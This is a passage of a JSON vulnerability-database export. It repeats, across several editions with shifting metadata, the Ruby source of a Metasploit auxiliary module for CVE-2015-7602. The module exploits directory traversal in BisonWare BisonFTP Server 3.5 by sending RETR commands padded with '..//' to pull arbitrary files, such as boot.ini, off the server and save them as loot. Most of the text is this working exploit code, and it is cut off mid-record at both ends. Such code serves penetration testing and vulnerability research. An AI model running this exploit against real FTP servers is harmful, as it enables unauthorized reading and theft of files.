rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T10:10:12", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T12:09:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T12:09:51", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T12:09:51", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-21T22:52:06", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-21T22:52:06", "value": 6.3}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-21T22:52:06", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-22T00:52:35", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-22T00:52:35", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-22T00:52:35", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T19:47:16", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T19:47:16", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T19:47:16", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T23:12:07", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T23:12:07", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T23:12:07", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T13:50:49", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T13:50:49", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T13:50:49", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T15:56:21", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T15:56:21", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if 